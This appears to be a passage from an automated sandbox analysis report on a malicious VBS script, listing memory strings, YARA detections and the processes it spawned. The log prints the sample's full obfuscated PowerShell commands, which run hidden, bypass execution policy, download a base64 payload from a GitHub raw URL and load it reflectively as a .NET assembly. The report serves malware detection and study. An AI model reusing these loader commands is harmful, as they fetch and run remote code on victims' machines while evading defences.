Source: powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2386759505.000002072C712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA8F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA90A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2386759505.000002072C02D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49710 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5048, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: 2THp7fwNQD.vbsInitial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5048, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/5@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5vpljo5.x3n.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
